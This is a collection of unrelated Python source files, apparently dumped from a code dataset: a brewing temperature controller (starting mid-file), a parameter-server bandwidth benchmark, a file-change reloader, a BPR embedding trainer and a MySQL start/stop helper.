(temp,) = self.rxTemp.match(temp).groups()
temperature = float(temp) / 1000
ok = True
return (temperature, ok)
def _get_probes_to_monitor(self):
probes = []
for probe in os.listdir(self.tempBaseDir):
if probe[0:2] == "28":
if self.probesToMonitor.has_key(probe):
probes.append(probe)
return probes
def _error_reading_from_external_temperature_probe(self, probe):
"""
A reading of exactly 85 can be an error from the 1wire probe.
This rejects a reading of exactly 85 if the preceeding reading isn't
close enough
"""
if self.lastResult[probe] > 80 and self.lastResult[probe] < 85:
pass
elif self.lastResult[probe] > 85:
pass
else:
self._reject_result(probe, 85, '85 indicates mis-read')
return True
return False
def getResult(self):
for probe in self._get_probes_to_monitor():
# A place to store odd results
if not self.odd_readings.has_key(probe):
self.odd_readings[probe] = []
if self.probesToMonitor[probe]:
(temperature, ok) = self._read_temperature_from_external_probe(probe)
if ok:
if not self.lastResult.has_key(probe):
self.lastResult[probe] = 0
# Exactly 85 indictes misread
if temperature == 85 and self._error_reading_from_external_temperature_probe(probe):
return True
if (self.lastResult[probe]) == 0 or len(self.odd_readings[probe]) > 5:
self._accept_adjust_and_add_a_reading(probe, temperature)
else:
if temperature > self.lastResult[probe] * 1.05 or temperature < self.lastResult[probe] * 0.95:
self._reject_result(probe, temperature, '+/- 5%% swing')
else:
self._accept_adjust_and_add_a_reading(probe, temperature)
time.sleep(3.0)
def submission(self):
self._log("Submitting to control of Controller")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 4)
self.sock.bind(('', self.cfg.mcastPort))
mreq = struct.pack("4sl", socket.inet_aton(self.cfg.mcastGroup), socket.INADDR_ANY)
self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
self.mcastMembership = True
if os.path.exists("ipc/overrideModeFerm"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.fermProbe] = True
try:
fhandle = open('ipc/overrideModeFerm')
target = float(o.readline().rstrip())
fhandle.close()
except:
target = 17
self._targetFerm = (target - 0.3, target + 0.3, target)
self._mode = 'ferm'
print "Fermentation override mode - target"
elif os.path.exists("/tmp/standalone-temp-active"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.tempProbe] = True
self._targetFerm = 19
while self._loop_multicast_socket == True:
(data, addr) = self.sock.recvfrom(1200)
self.decodeMessage(data)
def decodeMessage(self, data):
"""
"""
try:
cm = json.loads(data)
except:
self._log("Error unpickling input message\n%s" % (data))
return
checksum = cm['_checksum']
cm['_checksum'] = " "
ourChecksum = hashlib.sha1("%s%s" % (cm, self.cfg.checksum)).hexdigest()
self._mode = cm['_mode']
if cm.has_key("_recipe"):
self._recipe = cm['_recipe']
if cm.has_key("_brewlog"):
self._brewlog = cm['_brewlog']
# looks like we receive targets out of cm['boil'], cm['ferm'], cm['mash'], cm['hlt']
# these come from governor via sendOrders()
# so now we are sending this back on the broadcast of our results, with tempTarget (HLT,Boil, Ferm)
# and tempTarget2 (Mash)
self._targetHlt = (-1, -1, -1)
self._targetMash = (-1, -1, -1)
self._targetSparge = (-1, -1, -1)
self._targetFerm = (-1, -1, -1)
self._targetBoil = (-1, -1, -1)
if os.path.exists('ipc/single-temp-probe'):
self.probesToMonitor[self.cfg.hltProbe] = True
elif cm['_mode'].count("pump") or cm['_mode'].count("cool") or cm['_mode'].count("ferm-wait"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.fermProbe] = True
self.probesToMonitor[self.cfg.boilProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = False
self._targetFerm = cm['ferm']
self._targetBoil = cm['boil']
elif cm['_mode'].count("ferm"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.fermProbe] = True
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = False
self._targetFerm = cm['ferm']
elif cm['_mode'].count("sparge"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = True
self.probesToMonitor[self.cfg.mashBProbe] = True
self._targetMash = cm['mash']
elif cm['_mode'].count("delayed_HLT"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.fermProbe] = True
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self._targetHlt = cm['hlt']
elif cm['_mode'].count("hlt") and cm['_mode'].count("mash"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = True
self.probesToMonitor[self.cfg.mashBProbe] = True
self.probesToMonitor[self.cfg.fermProbe] = True
self.probesToMonitor[self.cfg.boilProbe] = False
self._targetHlt = cm['hlt']
self._targetMash = cm['mash']
elif cm['_mode'].count("hlt"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self._targetHlt = cm['hlt']
elif cm['_mode'].count("delayed_HLT"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self._targetHlt = cm['hlt']
elif cm['_mode'].count("boil"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.boilProbe] = True
self.probesToMonitor[self.cfg.hltProbe] = False
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.fermProbe] = False
self._targetBoil = cm['boil']
elif cm['_mode'].count("mash"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.mashAProbe] = True
self.probesToMonitor[self.cfg.mashBProbe] = True
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = False
self._targetMash = cm['mash']
else:
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = False
self.doTemperatureing = False
def start(self):
self._log("Starting pitmTemperature")
while True:
self.getResult()
self.broadcastResult()
time.sleep(1)
if __name__ == '__main__':
try:
controller = pitmTemperature()
# get under the control of the contoller
controlThread = threading.Thread(target=controller.submission)
controlThread.daemon = True
controlThread.start()
controller.start()
except KeyboardInterrupt:
controller.uncontrol()
|
test_bandwidth.py
|
from athena import ndarray, optimizer
from athena import gpu_ops as ad
import time, os, sys
import yaml
import multiprocessing
import argparse
import signal
import numpy as np
import ctypes
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor
import threading
def pointer(arr):
assert(arr.data.c_contiguous)
assert(arr.dtype == np.long)
return ctypes.cast(arr.ctypes.data, ctypes.POINTER(ctypes.c_long))
def test(func_name, nitem=2000, item_len=10000, ind_len=500, max_thread=10, ret_ans=False):
func_name = func_name.lower()
ctx = ndarray.cpu(0)
rank = int(os.environ["WORKER_ID"])
nrank = int(os.environ["DMLC_NUM_WORKER"])
comm = ad.get_worker_communicate()
byte_count = 0
if func_name == 'pushnpull':
inarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
comm.Push(name, inarr.handle, None)
comm.Pull(name, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += nitem * item_len * 4 * 2
elif func_name == 'pushpull':
inarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
comm.DDPushPull(name, inarr.handle, outarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += nitem * item_len * 4 * 2
elif func_name == 'sparsepushnpull':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
np_ind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_ind.astype(np.float32), ctx=ctx)
uni_ind_len = np.unique(np_ind).size
comm.SparsePush(name, inind.handle, inarr.handle, None)
comm.Pull(name, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += (nitem + uni_ind_len) * item_len * 4
elif func_name == 'sparsepushnsparsepull':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
def func(name):
np_inind = np.random.randint(low=0, high=nitem, size=(ind_len,))
np_outind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_inind.astype(np.float32), ctx=ctx)
outind = ndarray.array(np_outind.astype(np.float32), ctx=ctx)
uni_inind_len = np.unique(np_inind).size
uni_outind_len = np.unique(np_outind).size
comm.SparsePush(name, inind.handle, inarr.handle, None)
comm.SparsePull(name, outind.handle, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += (uni_inind_len + uni_outind_len) * item_len * 4
elif func_name == 'push':
inarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
comm.Push(name, inarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += nitem * item_len * 4
elif func_name == 'pull':
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
comm.Pull(name, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += nitem * item_len * 4
elif func_name == 'sparsepush':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
def func(name):
np_inind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_inind.astype(np.float32), ctx=ctx)
uni_inind_len = np.unique(np_inind).size
comm.SparsePush(name, inind.handle, inarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += uni_inind_len * item_len * 4
elif func_name == 'sparsepull':
outarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
def func(name):
np_outind = np.random.randint(low=0, high=nitem, size=(ind_len,))
outind = ndarray.array(np_outind.astype(np.float32), ctx=ctx)
uni_outind_len = np.unique(np_outind).size
comm.SparsePull(name, outind.handle, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += uni_outind_len * item_len * 4
elif func_name == 'sdpushpull':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
np_inind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_inind.astype(np.float32), ctx=ctx)
uni_inind_len = np.unique(np_inind).size
comm.SDPushPull(name, inind.handle, inarr.handle, outarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += (uni_inind_len + nitem) * item_len * 4
elif func_name == 'sspushpull':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
def func(name):
np_inind = np.random.randint(low=0, high=nitem, size=(ind_len,))
np_outind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_inind.astype(np.float32), ctx=ctx)
uni_inind_len = np.unique(np_inind).size
outind = ndarray.array(np_outind.astype(np.float32), ctx=ctx)
uni_outind_len = np.unique(np_outind).size
comm.SSPushPull(name, inind.handle, inarr.handle, outind.handle, outarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += (uni_inind_len + uni_outind_len) * item_len * 4
else:
assert False
if 'sparse' in func_name or func_name in ('sdpushpull', 'sspushpull'):
arr_len = ctypes.c_int(nitem)
arr_wid = ctypes.c_int(item_len)
sparse_init = ctypes.c_int(1)
else:
arr_len = ctypes.c_int(nitem * item_len)
arr_wid = ctypes.c_int(1)
sparse_init = ctypes.c_int(0)
for i in range(max_thread):
comm.InitTensor(i, sparse_init, arr_len, arr_wid, ctypes.c_int(0), ctypes.c_double(0), ctypes.c_double(1))
# print("data init")
t = ThreadPoolExecutor(max_workers=max_thread)
if ret_ans:
task_list = [None for i in range(max_thread)]
for i in range(max_thread):
task_list[i] = t.submit(func, i)
curByte = byte_count
start = time.time()
cnt = 0
while cnt < 30:
for i in range(max_thread):
if task_list[i].done():
cnt += 1
task_list[i] = t.submit(func, i)
speed = (byte_count - curByte) / (time.time() - start) / 2 ** 20
t.shutdown()
for i in range(max_thread):
comm.ClearOnServer(i)
comm.Clear(i)
return speed
else:
def watch():
start = time.time()
while True:
time.sleep(1)
speed = byte_count / (time.time() - start)
print("speed : {} MB/s".format(speed / 2**20))
task_list = [None for i in range(max_thread)]
threading.Thread(target=watch).start()
while True:
for i in range(max_thread):
if task_list[i] is None or task_list[i].done():
task_list[i] = t.submit(func, i)
def test_dense_n_draw(range_size, func, trial=5, use_text=False):
assert func in ('pushpull', 'push', 'pull', 'pushnpull')
assert trial >= 3
ans = {}
for i in tqdm(range_size):
temps = []
for _ in range(trial):
temps.append(test(func, i, 1, ret_ans=True))
temps.remove(max(temps))
temps.remove(min(temps))
ans[i] = sum(temps) / (trial - 2)
# ans[i] = test(func, i, 1, ret_ans=True)
print(ans)
import matplotlib.pyplot as plt
xs = list(ans.keys())
ys = list(ans.values())
plt.bar(xs, ys, width=range_size.step // 2)
plt.xlabel('Data Size')
plt.ylabel('Bandwidth MB/s')
plt.title('Bandwidth of ' + func)
if use_text:
for xx, yy in zip(xs, ys):
plt.text(xx, yy + 20, '%.0f' % yy, ha='center', va='bottom')
plt.savefig('test_dense_bandwidth.png')
def test_sparse_n_draw(range_ind_len, range_item_len, func, trial=5, use_text=False):
assert func in ('sparsepush', 'sparsepull')
assert trial >= 3
ans = {}
for i in tqdm(range_ind_len):
for j in range_item_len:
nitem = 5 * i
temps = []
for _ in range(trial):
temps.append(test(func, nitem, j, i, ret_ans=True))
temps.remove(max(temps))
temps.remove(min(temps))
ans[(i, j)] = sum(temps) / (trial - 2)
# ans[(i, j)] = test(func, nitem, j, i, ret_ans=True)
print(ans)
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
xs, ys = [], []
for k in ans.keys():
xs.append(k[0])
ys.append(k[1])
ax = plt.subplot(111, projection='3d')
zs = list(ans.values())
ax.bar3d([xx - range_ind_len.step // 4 for xx in xs], [yy - range_item_len.step // 4 for yy in ys], np.zeros_like(xs), range_ind_len.step // 2, range_item_len.step // 2, zs)
if use_text:
for xx, yy, zz in zip(xs, ys, zs):
ax.text(xx, yy, zz, '%.0f' % zz, ha='center', va='bottom')
ax.set_xlabel('Index Size')
ax.set_ylabel('Item Length')
ax.set_zlabel('Bandwidth MB/s')
ax.set_title('Bandwidth of ' + func)
plt.savefig('test_sparse_bandwidth.png')
def start_process(settings, args):
for key, value in settings.items():
os.environ[key] = str(value)
if os.environ['DMLC_ROLE'] == "server":
ad.server_init()
ad.server_finish()
elif os.environ['DMLC_ROLE'] == "worker":
ad.worker_init()
test(args.func)
# test_dense_n_draw(range(100000, 1000000, 100000), 'pushpull')
# test_sparse_n_draw(range(100, 600, 100), range(1000, 6000, 1000), 'sparsepush')
ad.worker_finish()
elif os.environ['DMLC_ROLE'] == "scheduler":
ad.scheduler_init()
ad.scheduler_finish()
else:
raise ValueError("Unknown role", os.environ['DMLC_ROLE'])
def signal_handler(signal, frame):
print("SIGINT signal caught, stop Training")
for proc in process_list:
proc.kill()
exit(0)
if __name__ =='__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--config", default='./settings/local_s2_w1.yml')
parser.add_argument("--func", default='pushpull')
args = parser.parse_args()
assert args.func in ('pushpull', 'pushnpull', 'sparsepushnpull', 'sparsepushnsparsepull', \
'push', 'pull', 'sparsepush', 'sparsepull', 'sdpushpull', 'sspushpull')
file_path = args.config
settings = yaml.load(open(file_path).read(), Loader=yaml.FullLoader)
process_list = []
for key, value in settings.items():
if key != 'shared':
proc = multiprocessing.Process(target=start_process, args=[value, args])
process_list.append(proc)
proc.start()
signal.signal(signal.SIGINT, signal_handler)
for proc in process_list:
proc.join()
|
statreload.py
|
import multiprocessing
import os
import signal
import time
from pathlib import Path
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
class StatReload:
def __init__(self, config):
self.config = config
self.should_exit = False
self.reload_count = 0
self.mtimes = {}
def handle_exit(self, sig, frame):
self.should_exit = True
def run(self, target, *args, **kwargs):
pid = os.getpid()
logger = self.config.logger_instance
logger.info("Started reloader process [{}]".format(pid))
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
spawn = multiprocessing.get_context("spawn")
process = spawn.Process(target=target, args=args, kwargs=kwargs)
process.start()
while process.is_alive() and not self.should_exit:
time.sleep(0.1)
if self.should_restart():
self.clear()
os.kill(process.pid, signal.SIGTERM)
process.join()
process = spawn.Process(target=target, args=args, kwargs=kwargs)
process.start()
self.reload_count += 1
logger.info("Stopping reloader process [{}]".format(pid))
def clear(self):
self.mtimes = {}
def should_restart(self):
for filename in self.iter_py_files():
try:
mtime = os.stat(filename).st_mtime
except OSError as exc: # pragma: nocover
continue
old_time = self.mtimes.get(filename)
if old_time is None:
self.mtimes[filename] = mtime
continue
elif mtime > old_time:
display_path = os.path.normpath(filename)
if Path.cwd() in Path(filename).parents:
display_path = os.path.normpath(os.path.relpath(filename))
message = "Detected file change in '%s'. Reloading..."
self.config.logger_instance.warning(message, display_path)
return True
return False
def iter_py_files(self):
for reload_dir in self.config.reload_dirs:
for subdir, dirs, files in os.walk(reload_dir):
for file in files:
filepath = subdir + os.sep + file
if filepath.endswith(".py"):
yield filepath
|
bpr.py
|
from pysmore.libs import graph, optimizer, embedding, util
import multiprocessing as mp
### global variables ###
globalVariables = {
'graph': None,
'optimizer': optimizer.get_margin_bpr_loss,
'updater': embedding.update_l2_embedding,
'progress': util.print_progress,
'l2_reg': 0.0001,
'init_alpha': 0.025,
'num_negative': 5
}
current_update_times = mp.RawValue('i', 0)
userEmbed = None
itemEmbed = None
######
### user functions ###
def create_graph(train_path, embedding_dimension=64, delimiter='\t'):
global globalVariables
global userEmbed
global itemEmbed
globalVariables['graph'] = graph.Graph(train_path, delimiter=delimiter, mode='edge')
print('create embeddings...', end='', flush=True)
userEmbed = embedding.create_embeddings_unsafe(
amount=globalVariables['graph'].vertex_count,
dimensions=embedding_dimension)
itemEmbed = embedding.create_embeddings_unsafe(
amount=globalVariables['graph'].context_count,
dimensions=embedding_dimension)
print('DONE', flush=True)
return userEmbed, globalVariables['graph'].vertex_mapper, itemEmbed, globalVariables['graph'].context_mapper
def set_param(params):
global globalVariables
for key in params:
globalVariables[key] = params[key]
def train(update_times=10, workers=1):
global globalVariables
globalVariables['total_update_times'] = int(update_times * 1000000)
globalVariables['workers'] = workers
globalVariables['worker_update_times'] = int((update_times * 1000000)/workers)
globalVariables['min_alpha'] = globalVariables['init_alpha'] * 1000 / globalVariables['total_update_times']
util.optimize_numpy_multiprocessing(workers)
processes = []
for i in range(workers):
p = mp.Process(target=learner, args=())
p.start()
processes.append(p)
for p in processes:
p.join()
current_update_times.value = 0
globalVariables['progress'](1.0)
def save_embeddings(file_prefix="bpr"):
global globalVariables
global userEmbed
global itemEmbed
print()
embedding.save_embeddings(userEmbed, globalVariables['graph'].vertices, file_prefix+'_vertex')
embedding.save_embeddings(itemEmbed, globalVariables['graph'].contexts, file_prefix+'_context')
######
### main learner ###
def learner():
globalVariables['graph'].cache_edge_samples(globalVariables['worker_update_times'])
globalVariables['progress'](0.0)
monitor_flag = int(1e3)
_learning_rate = globalVariables['init_alpha']
for i in range(1, globalVariables['worker_update_times']+1):
user, user_idx, item_pos, item_pos_idx, weight = \
globalVariables['graph'].draw_an_edge_from_sample()
item_neg, item_neg_idxs = globalVariables['graph'].draw_contexts_uniformly(amount=globalVariables['num_negative'])
for item_neg_idx in item_neg_idxs:
user_embedding = userEmbed[user_idx]
item_pos_embedding = itemEmbed[item_pos_idx] # should resample positive context everytime
item_neg_embedding = itemEmbed[item_neg_idx]
user_loss, item_pos_loss, item_neg_loss = \
globalVariables['optimizer'](user_embedding, item_pos_embedding, item_neg_embedding)
globalVariables['updater'](userEmbed, user_idx, user_loss, _learning_rate, globalVariables['l2_reg'])
globalVariables['updater'](itemEmbed, item_pos_idx, item_pos_loss, _learning_rate, globalVariables['l2_reg'])
globalVariables['updater'](itemEmbed, item_neg_idx, item_neg_loss, _learning_rate, globalVariables['l2_reg'])
if i % monitor_flag == 0:
current_progress_percentage = current_update_times.value / globalVariables['total_update_times']
_learning_rate = globalVariables['init_alpha'] * (1.0 - current_progress_percentage)
_learning_rate = max(globalVariables['min_alpha'], _learning_rate)
current_update_times.value += monitor_flag
globalVariables['progress'](current_progress_percentage)
######
|
manage_mysql_script.py
|
import os
import threading
class Manage_Mysql:
def get_path(self):
lines = [line.rstrip('\n') for line in open('data/mysql_path.txt')]
return lines[0]
def start_mysql(self):
path = self.get_path();
print(path + 'mysqld')
os.system(path + 'mysqld')
def start(self):
threading.Thread(target=self.start_mysql).start()
def stop(self):
path = self.get_path();
os.system(path + 'mysqladmin -u root shutdown')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.